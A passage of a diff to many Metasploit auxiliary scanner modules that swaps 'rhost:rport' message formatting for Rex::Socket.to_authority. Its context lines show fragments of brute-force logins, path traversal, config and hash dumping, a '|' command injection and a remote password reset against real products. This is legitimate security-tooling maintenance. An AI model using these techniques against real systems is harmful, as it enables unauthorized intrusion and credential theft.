         @users[uid] = :reported
         next
       end

--- a/modules/auxiliary/scanner/ftp/ftp_login.rb
+++ b/modules/auxiliary/scanner/ftp/ftp_login.rb
@@ -121,10 +121,10 @@ class MetasploitModule < Msf::Auxiliary
     write_check = scanner.send_cmd(['MKD', dir], true)
     if write_check and write_check =~ /^2/
       scanner.send_cmd(['RMD', dir], true)
-      print_status("#{rhost}:#{rport} - User '#{user}' has READ/WRITE access")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - User '#{user}' has READ/WRITE access")
       return 'Read/Write'
     else
-      print_status("#{rhost}:#{rport} - User '#{user}' has READ access")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - User '#{user}' has READ access")
       return 'Read-only'
     end
   end

--- a/modules/auxiliary/scanner/h323/h323_version.rb
+++ b/modules/auxiliary/scanner/h323/h323_version.rb
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Auxiliary
           end
 
           # Diagnostics
-          # print_status("Host: #{rhost}:#{rport} => #{info.inspect}")
+          # print_status("Host: #{Rex::Socket.to_authority(rhost, rport)} => #{info.inspect}")
 
           # The remote side of the call was connected (kill it)
           break if info[:type] == @@H323_STATUS_CONNECT
@@ -106,7 +106,7 @@ class MetasploitModule < Msf::Auxiliary
       raise $!
     rescue ::Rex::ConnectionError, ::IOError, ::Errno::ECONNRESET, ::Errno::ENOPROTOOPT
     rescue ::Exception
-      print_error("#{rhost}:#{rport} #{$!.class} #{$!} #{$!.backtrace}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} #{$!.class} #{$!} #{$!.backtrace}")
     ensure
       disconnect
     end
@@ -130,7 +130,7 @@ class MetasploitModule < Msf::Auxiliary
         banner << "DisplayName: #{remote_display}"
       end
 
-      print_good("#{rhost}:#{rport} #{banner}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} #{banner}")
       report_service(:host => rhost, :port => rport, :name => "h323", :info => banner)
     end
   end

--- a/modules/auxiliary/scanner/http/adobe_xml_inject.rb
+++ b/modules/auxiliary/scanner/http/adobe_xml_inject.rb
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Auxiliary
       if (res.nil?)
         print_error("no response for #{ip}:#{rport} #{check}")
       elsif (res.code == 200 and res.body =~ /\<\?xml version\="1.0" encoding="utf-8"\?\>/)
-        print_status("#{rhost}:#{rport} #{check} #{res.code}\n #{res.body}")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} #{check} #{res.code}\n #{res.body}")
       elsif (res and res.code == 302 or res.code == 301)
         print_status(" Received 302 to  #{res.headers['Location']} for #{check}")
       else

--- a/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb
+++ b/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_host(ip)
-    print_status("#{rhost}:#{rport} - Sending request...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending request...")
     uri = normalize_uri(target_uri.path)
     res = send_request_cgi({
       'uri' => uri,
@@ -64,9 +64,9 @@ class MetasploitModule < Msf::Auxiliary
         contents,
         fname
       )
-      print_status("#{rhost}:#{rport} - File saved in: #{path}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - File saved in: #{path}")
     else
-      print_error("#{rhost}:#{rport} - Failed to retrieve file")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to retrieve file")
       return
     end
   end

--- a/modules/auxiliary/scanner/http/apache_activemq_traversal.rb
+++ b/modules/auxiliary/scanner/http/apache_activemq_traversal.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Auxiliary
   def run_host(ip)
     # No point to continue if no filename is specified
     if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
-      print_error("#{rhost}:#{rport} - Please supply FILEPATH")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Please supply FILEPATH")
       return
     end
 
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
     travs << "/" unless datastore['FILEPATH'][0] == "\\" or datastore['FILEPATH'][0] == "/"
     travs << datastore['FILEPATH']
 
-    print_status("#{rhost}:#{rport} - Sending request...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending request...")
     res = send_request_cgi({
       'uri' => travs,
       'method' => 'GET',
@@ -74,9 +74,9 @@ class MetasploitModule < Msf::Auxiliary
         contents,
         fname
       )
-      print_status("#{rhost}:#{rport} - File saved in: #{path}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - File saved in: #{path}")
     else
-      print_error("#{rhost}:#{rport} - Failed to retrieve file")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to retrieve file")
       return
     end
   end

--- a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
+++ b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
@@ -127,7 +127,7 @@ class MetasploitModule < Msf::Auxiliary
       when /<faultstring\>Invalid boolean value: \?(.*)<\/faultstring>/m
         loot = $1
         if not loot or loot.empty?
-          print_status("#{rhost}#{rport} Retrieved empty file from #{Rex::Socket.to_authority(rhost, rport)}")
+          print_status("#{Rex::Socket.to_authority(rhost, rport)} Retrieved empty file")
           return
         end
         f = ::File.basename(datastore['RFILE'])
@@ -137,6 +137,6 @@ class MetasploitModule < Msf::Auxiliary
       end
     end
 
-    print_error("#{rhost}#{rport} Failed to retrieve file from #{Rex::Socket.to_authority(rhost, rport)}")
+    print_error("#{Rex::Socket.to_authority(rhost, rport)} Failed to retrieve file")
   end
 end

--- a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
+++ b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Auxiliary
     })
 
     if not res
-      print_error("#{rhost}:#{rport} Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} Unable to connect")
       return
     end
 
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def accessfile(rhost)
     uri = normalize_uri(target_uri.path)
-    print_status("#{rhost}:#{rport} Connecting to Crowd SOAP Interface")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} Connecting to Crowd SOAP Interface")
 
     soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
     xmlaut = 'http://authentication.integration.crowd.atlassian.com'
@@ -127,16 +127,16 @@ class MetasploitModule < Msf::Auxiliary
       when /<faultstring\>Invalid boolean value: \?(.*)<\/faultstring>/m
         loot = $1
         if not loot or loot.empty?
-          print_status("#{rhost}#{rport} Retrieved empty file from #{rhost}:#{rport}")
+          print_status("#{rhost}#{rport} Retrieved empty file from #{Rex::Socket.to_authority(rhost, rport)}")
           return
         end
         f = ::File.basename(datastore['RFILE'])
         path = store_loot('atlassian.crowd.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
-        print_good("#{rhost}:#{rport} Atlassian Crowd - #{datastore['RFILE']} saved in #{path}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} Atlassian Crowd - #{datastore['RFILE']} saved in #{path}")
         return
       end
     end
 
-    print_error("#{rhost}#{rport} Failed to retrieve file from #{rhost}:#{rport}")
+    print_error("#{rhost}#{rport} Failed to retrieve file from #{Rex::Socket.to_authority(rhost, rport)}")
   end
 end

--- a/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb
+++ b/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb
@@ -98,17 +98,17 @@ class MetasploitModule < Msf::Auxiliary
         }
       )
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
-      print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - HTTP Connection Failed...")
       return false
     end
 
     if (res && res.code == 200 && res.headers['Server'] && (res.headers['Server'].include?('Team-R Web') || res.body.include?('binom_ico') || res.body.include?('team-r')))
 
-      print_good("#{rhost}:#{rport} - Binom3 confirmed...")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Binom3 confirmed...")
 
       return true
     else
-      print_error("#{rhost}:#{rport} - Application does not appear to be Binom3. Module will not continue.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Application does not appear to be Binom3. Module will not continue.")
       return false
     end
   end
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Auxiliary
   #
 
   def do_login(user, pass)
-    print_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying username:#{user.inspect} with password:#{pass.inspect}")
     begin
       res = send_request_cgi(
         {
@@ -133,13 +133,13 @@ class MetasploitModule < Msf::Auxiliary
         }
       )
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
-      vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - HTTP Connection Failed...")
       return :abort
     end
 
     if (res && res.code == 302 && res.get_cookies.include?('IDSESSION'))
 
-      print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+      print_good("SUCCESSFUL LOGIN - #{Rex::Socket.to_authority(rhost, rport)} - #{user.inspect}:#{pass.inspect}")
 
       report_cred(
         ip: rhost,
@@ -165,7 +165,7 @@ class MetasploitModule < Msf::Auxiliary
         vprint_status("#{rhost} - dumping configuration")
         vprint_status('++++++++++++++++++++++++++++++++++++++')
 
-        print_good("#{rhost}:#{rport} - Configuration file retrieved successfully!")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - Configuration file retrieved successfully!")
         path = store_loot(
           'Binom3_config',
           'text/xml',
@@ -174,9 +174,9 @@ class MetasploitModule < Msf::Auxiliary
           rport,
           'Binom3 device config'
         )
-        print_status("#{rhost}:#{rport} - Configuration file saved in: #{path}")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} - Configuration file saved in: #{path}")
       else
-        print_error("#{rhost}:#{rport} - Failed to retrieve configuration")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to retrieve configuration")
         return
       end
 
@@ -189,7 +189,7 @@ class MetasploitModule < Msf::Auxiliary
         vprint_status("#{rhost} - dumping password file")
         vprint_status('++++++++++++++++++++++++++++++++++++++')
 
-        print_good("#{rhost}:#{rport} - Password file retrieved successfully!")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - Password file retrieved successfully!")
         path = store_loot(
           'Binom3_passw',
           'text/xml',
@@ -198,12 +198,12 @@ class MetasploitModule < Msf::Auxiliary
           rport,
           'Binom3 device config'
         )
-        print_status("#{rhost}:#{rport} - Password file saved in: #{path}")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} - Password file saved in: #{path}")
       else
         return
       end
     else
-      print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+      print_error("FAILED LOGIN - #{Rex::Socket.to_authority(rhost, rport)} - #{user.inspect}:#{pass.inspect}")
     end
   end
 end

--- a/modules/auxiliary/scanner/http/canon_wireless.rb
+++ b/modules/auxiliary/scanner/http/canon_wireless.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Auxiliary
         'uri' => '/English/pages_MacUS/lan_set_content.html',
       })
     rescue
-      print_error("#{rhost}:#{rport} Could not connect.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} Could not connect.")
       return
     end
 
@@ -74,13 +74,13 @@ class MetasploitModule < Msf::Auxiliary
 
           return lan_setting, ssid
         else
-          print_error("#{rhost}:#{rport} Could not determine LAN Settings.")
+          print_error("#{Rex::Socket.to_authority(rhost, rport)} Could not determine LAN Settings.")
         end
 
       elsif res.code == 401
-        print_error("#{rhost}:#{rport} Authentication failed")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} Authentication failed")
       elsif res.code == 404
-        print_error("#{rhost}:#{rport} File not found")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} File not found")
       end
     end
   end
@@ -123,9 +123,9 @@ class MetasploitModule < Msf::Auxiliary
         return encryption_setting, encryption_key
 
       elsif res.code == 401
-        print_error("#{rhost}:#{rport} Authentication failed")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} Authentication failed")
       elsif res.code == 404
-        print_error("#{rhost}:#{rport} File not found")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} File not found")
       end
     end
   end

--- a/modules/auxiliary/scanner/http/cisco_device_manager.rb
+++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb
@@ -54,17 +54,17 @@ class MetasploitModule < Msf::Auxiliary
     }, 20)
 
     if res and res.code == 401
-      print_error("#{rhost}:#{rport} Failed to authenticate to this device")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} Failed to authenticate to this device")
       return
     end
 
     if res and res.code != 200
-      print_error("#{rhost}:#{rport} Unexpected response code from this device #{res.code}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} Unexpected response code from this device #{res.code}")
       return
     end
 
     if res and res.body and res.body =~ /Cisco (Internetwork Operating System|IOS) Software/
-      print_good("#{rhost}:#{rport} Successfully authenticated to this device")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} Successfully authenticated to this device")
       store_valid_credential(user: datastore['HttpUsername'], private: datastore['HttpPassword'])
 
       # Report a vulnerability only if no password was specified
@@ -91,10 +91,10 @@ class MetasploitModule < Msf::Auxiliary
 
       if res and res.body and res.body =~ /<FORM METHOD([^\>]+)\>(.*)/mi
         config = $2.gsub(/<\/[A-Z].*/i, '').strip
-        print_good("#{rhost}:#{rport} Processing the configuration file...")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} Processing the configuration file...")
         cisco_ios_config_eater(rhost, rport, config)
       else
-        print_error("#{rhost}:#{rport} Error: could not retrieve the IOS configuration")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} Error: could not retrieve the IOS configuration")
       end
 
     end

--- a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb
+++ b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary
       }, 20)
 
       if res and res.body and res.body =~ /Cisco Internetwork Operating System Software/
-        print_good("#{rhost}:#{rport} Found vulnerable privilege level: #{level}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} Found vulnerable privilege level: #{level}")
 
         report_vuln(
           {
@@ -73,7 +73,7 @@ class MetasploitModule < Msf::Auxiliary
 
         if res and res.body and res.body =~ /<FORM METHOD([^\>]+)\>(.*)<\/FORM>/mi
           config = $2.strip
-          print_good("#{rhost}:#{rport} Processing the configuration file...")
+          print_good("#{Rex::Socket.to_authority(rhost, rport)} Processing the configuration file...")
           cisco_ios_config_eater(rhost, rport, config)
           report_exploit(
             {
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Auxiliary
             }
           )
         else
-          print_error("#{rhost}:#{rport} Error: could not retrieve the IOS configuration")
+          print_error("#{Rex::Socket.to_authority(rhost, rport)} Error: could not retrieve the IOS configuration")
         end
 
         break

--- a/modules/auxiliary/scanner/http/cisco_ironport_enum.rb
+++ b/modules/auxiliary/scanner/http/cisco_ironport_enum.rb
@@ -42,16 +42,16 @@ class MetasploitModule < Msf::Auxiliary
 
   def run_host(ip)
     unless check_conn?
-      print_error("#{rhost}:#{rport} - Connection failed, Aborting...")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Connection failed, Aborting...")
       return
     end
 
     unless is_app_ironport?
-      print_error("#{rhost}:#{rport} - Application does not appear to be Cisco Ironport. Module will not continue.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Application does not appear to be Cisco Ironport. Module will not continue.")
       return
     end
 
-    print_status("#{rhost}:#{rport} - Starting login brute force...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Starting login brute force...")
     each_user_pass do |user, pass|
       do_login(user, pass)
     end
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Auxiliary
         }
       )
       if res
-        print_good("#{rhost}:#{rport} - Server is responsive...")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - Server is responsive...")
         return true
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
@@ -106,13 +106,13 @@ class MetasploitModule < Msf::Auxiliary
 
         if (product == 'Security Management Appliances')
           p_name = 'Cisco IronPort Security Management Appliance (SMA)'
-          print_good("#{rhost}:#{rport} - Running Cisco IronPort #{product} (SMA) - AsyncOS v#{version}")
+          print_good("#{Rex::Socket.to_authority(rhost, rport)} - Running Cisco IronPort #{product} (SMA) - AsyncOS v#{version}")
         elsif (product == 'Cisco IronPort Web Security Appliances')
           p_name = 'Cisco IronPort Web Security Appliance (WSA)'
-          print_good("#{rhost}:#{rport} - Running #{product} (WSA) - AsyncOS v#{version}")
+          print_good("#{Rex::Socket.to_authority(rhost, rport)} - Running #{product} (WSA) - AsyncOS v#{version}")
         elsif (product == 'Cisco IronPort Appliances')
           p_name = 'Cisco IronPort Email Security Appliance (ESA)'
-          print_good("#{rhost}:#{rport} - Running #{product} (ESA) - AsyncOS v#{version}")
+          print_good("#{Rex::Socket.to_authority(rhost, rport)} - Running #{product} (ESA) - AsyncOS v#{version}")
         end
 
         return true
@@ -133,7 +133,7 @@ class MetasploitModule < Msf::Auxiliary
   #
 
   def do_login(user, pass)
-    vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying username:#{user.inspect} with password:#{pass.inspect}")
     begin
       res = send_request_cgi(
         {
@@ -151,16 +151,16 @@ class MetasploitModule < Msf::Auxiliary
       )
 
       if res and res.get_cookies.include?('authenticated=')
-        print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
 
         store_valid_credential(user: user, private: pass, proof: res.get_cookies.inspect)
         return :next_user
 
       else
-        vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
-      print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - HTTP Connection Failed, Aborting")
       return :abort
     end
   end

--- a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb
+++ b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Auxiliary
     part2 = '&fileType=snapshot'
 
     begin
-      print_status("Attempting to connect to #{rhost}:#{rport}")
+      print_status("Attempting to connect to #{Rex::Socket.to_authority(rhost, rport)}")
       res = send_request_raw(
         {
           'method' => 'GET',
@@ -60,10 +60,10 @@ class MetasploitModule < Msf::Auxiliary
             }, 25
           )
           if (res and res.code == 200)
-            print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}")
+            print_status("Request ##{level} may have succeeded on #{Rex::Socket.to_authority(rhost, rport)}!\r\n Response: \r\n#{res.body}")
             break
           elsif (res and res.code)
-            print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n")
+            print_error("Attempt ##{level} returned HTTP error #{res.code} on #{Rex::Socket.to_authority(rhost, rport)}\r\n")
           end
         end
       end

--- a/modules/auxiliary/scanner/http/cnpilot_r_web_login_loot.rb
+++ b/modules/auxiliary/scanner/http/cnpilot_r_web_login_loot.rb
@@ -86,15 +86,15 @@ class MetasploitModule < Msf::Auxiliary
     )
 
     if res && res.code == 200 && res.headers['content-disposition']
-      print_status("#{rhost}:#{rport} - dumping device configuration")
-      print_good("#{rhost}:#{rport} - Configfile.cfg retrieved successfully!")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - dumping device configuration")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Configfile.cfg retrieved successfully!")
       loot_name = 'Configfile.cfg'
       loot_type = 'text/plain'
       loot_desc = 'Cambium cnPilot Config'
       path = store_loot(loot_name, loot_type, datastore['RHOST'], res.body, loot_desc)
-      print_good("#{rhost}:#{rport} - File saved in: #{path}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - File saved in: #{path}")
     else
-      print_error("#{rhost}:#{rport} - Failed to retrieve config. Set a higher HTTPCLIENTTIMEOUT and try again.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to retrieve config. Set a higher HTTPCLIENTTIMEOUT and try again.")
       return
     end
   end

--- a/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb
+++ b/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary
     begin
       res = send_request_cgi({ 'uri' => '/' })
     rescue ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to connect to the web server")
       return false
     end
 

--- a/modules/auxiliary/scanner/http/dolibarr_16_contact_dump.rb
+++ b/modules/auxiliary/scanner/http/dolibarr_16_contact_dump.rb
@@ -108,7 +108,7 @@ class MetasploitModule < Msf::Auxiliary
     )
 
     print_good("Found #{nbr_contact} contacts.")
-    print_good("#{rhost}:#{rport} - File saved in: #{path_json_file}")
+    print_good("#{Rex::Socket.to_authority(rhost, rport)} - File saved in: #{path_json_file}")
 
     csv_string = CSV.generate do |csv| # Loop to write into csv
       csv << contact_fields
@@ -131,7 +131,7 @@ class MetasploitModule < Msf::Auxiliary
       '.csv'
     )
 
-    print_good("#{rhost}:#{rport} - File saved in: #{path_csv_file}")
+    print_good("#{Rex::Socket.to_authority(rhost, rport)} - File saved in: #{path_csv_file}")
   end
 
 end

--- a/modules/auxiliary/scanner/http/epmp1000_dump_config.rb
+++ b/modules/auxiliary/scanner/http/epmp1000_dump_config.rb
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Auxiliary
 
   # Dump config
   def dump_config(config_uri, cookie)
-    print_status("#{rhost}:#{rport} - Attempting to dump configuration...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempting to dump configuration...")
     res = send_request_cgi(
       {
         'method' => 'GET',
@@ -73,11 +73,11 @@ class MetasploitModule < Msf::Auxiliary
     )
 
     if good_response
-      print_good("#{rhost}:#{rport} - File retrieved successfully!")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - File retrieved successfully!")
       path = store_loot('ePMP_config', 'text/plain', rhost, res.body, 'Cambium ePMP 1000 device config')
-      print_status("#{rhost}:#{rport} - File saved in: #{path}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - File saved in: #{path}")
     else
-      print_error("#{rhost}:#{rport} - Failed to retrieve configuration")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to retrieve configuration")
     end
   end
 

--- a/modules/auxiliary/scanner/http/epmp1000_dump_hashes.rb
+++ b/modules/auxiliary/scanner/http/epmp1000_dump_hashes.rb
@@ -111,10 +111,10 @@ class MetasploitModule < Msf::Auxiliary
       )
 
       if good_response
-        print_status("#{rhost}:#{rport} - Dumping password hashes")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} - Dumping password hashes")
 
         path = store_loot('ePMP_passwd', 'text/plain', rhost, res.body, 'Cambium ePMP 1000 password hashes')
-        print_status("#{rhost}:#{rport} - Hashes saved in: #{path}")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} - Hashes saved in: #{path}")
 
         # clean up the passwd file from /www/
         command = 'rm /www/' + random_filename
@@ -146,10 +146,10 @@ class MetasploitModule < Msf::Auxiliary
         )
       else
         check_file_uri = "#{(ssl ? 'https' : 'http')}" + '://' + "#{rhost}:#{rport}" + '/' + random_filename
-        print_error("#{rhost}:#{rport} - Could not retrieve hashes. Try manually by directly accessing #{check_file_uri}.")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - Could not retrieve hashes. Try manually by directly accessing #{check_file_uri}.")
       end
     else
-      print_error("#{rhost}:#{rport} - Failed to dump hashes.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to dump hashes.")
     end
   end
 

--- a/modules/auxiliary/scanner/http/epmp1000_get_chart_cmd_exec.rb
+++ b/modules/auxiliary/scanner/http/epmp1000_get_chart_cmd_exec.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary
     inject = '|' + "#{command}"
     clean_inject = CGI.unescapeHTML(inject.to_s)
 
-    print_status("#{rhost}:#{rport} - Executing #{command}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Executing #{command}")
     res = send_request_cgi(
       {
         'method' => 'POST',
@@ -86,9 +86,9 @@ class MetasploitModule < Msf::Auxiliary
 
     if good_response
       path = store_loot('ePMP_cmd_exec', 'text/plain', rhost, res.body, 'Cambium ePMP 1000 Command Exec Results')
-      print_status("#{rhost}:#{rport} - Results saved in: #{path}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Results saved in: #{path}")
     else
-      print_error("#{rhost}:#{rport} - Failed to execute command(s).")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to execute command(s).")
     end
   end
 

--- a/modules/auxiliary/scanner/http/epmp1000_ping_cmd_exec.rb
+++ b/modules/auxiliary/scanner/http/epmp1000_ping_cmd_exec.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
     inject = '|' + "#{command}" + ' ||'
     clean_inject = CGI.unescapeHTML(inject.to_s)
 
-    print_status("#{rhost}:#{rport} - Executing #{command}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Executing #{command}")
     res = send_request_cgi(
       {
         'method' => 'POST',
@@ -90,9 +90,9 @@ class MetasploitModule < Msf::Auxiliary
 
     if good_response
       path = store_loot('ePMP_cmd_exec', 'text/plain', rhost, res.body, 'Cambium ePMP 1000 Command Exec Results')
-      print_status("#{rhost}:#{rport} - Results saved in: #{path}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Results saved in: #{path}")
     else
-      print_error("#{rhost}:#{rport} - Failed to execute command(s).")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to execute command(s).")
     end
   end
 

--- a/modules/auxiliary/scanner/http/epmp1000_reset_pass.rb
+++ b/modules/auxiliary/scanner/http/epmp1000_reset_pass.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary
   def reset_pass(config_uri, cookie)
     pass_change_req = '{"device_props":{"' + "#{datastore['TARGET_USERNAME']}" + '_password' + '":"' + "#{datastore['NEW_PASSWORD']}" + '"},"template_props":{"config_id":"11"}}'
 
-    print_status("#{rhost}:#{rport} - Changing password for #{datastore['TARGET_USERNAME']} to #{datastore['NEW_PASSWORD']}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Changing password for #{datastore['TARGET_USERNAME']} to #{datastore['NEW_PASSWORD']}")
 
     res = send_request_cgi(
       {
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Auxiliary
     if good_response
       print_good('Password successfully changed!')
     else
-      print_error("#{rhost}:#{rport} - Failed to change password.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to change password.")
     end
   end
 

--- a/modules/auxiliary/scanner/http/gavazzi_em_login_loot.rb
+++ b/modules/auxiliary/scanner/http/gavazzi_em_login_loot.rb
@@ -70,7 +70,7 @@ class MetasploitModule < Msf::Auxiliary
         }
       )
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - HTTP Connection Failed...")
       return false
     end
 
@@ -81,10 +81,10 @@ class MetasploitModule < Msf::Auxiliary
     )
 
     if good_response
-      vprint_good("#{rhost}:#{rport} - Running Carlo Gavazzi VMU-C Web Management portal...")
+      vprint_good("#{Rex::Socket.to_authority(rhost, rport)} - Running Carlo Gavazzi VMU-C Web Management portal...")
       return true
     else
-      vprint_error("#{rhost}:#{rport} - Application is not Carlo Gavazzi. Module will not continue.")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Application is not Carlo Gavazzi. Module will not continue.")
       return false
     end
   end
@@ -121,7 +121,7 @@ class MetasploitModule < Msf::Auxiliary
   #
 
   def do_login(user, pass)
-    vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying username:#{user.inspect} with password:#{pass.inspect}")
 
     # Set Cookie - Box is vuln to Session Fixation. Generating a random cookie for use.
     randomvalue = Rex::Text.rand_text_alphanumeric(26)
@@ -144,7 +144,7 @@ class MetasploitModule < Msf::Auxiliary
         }
       )
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
-      vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - HTTP Connection Failed...")
       return :abort
     end
 
@@ -156,7 +156,7 @@ class MetasploitModule < Msf::Auxiliary
     )
 
     if good_response
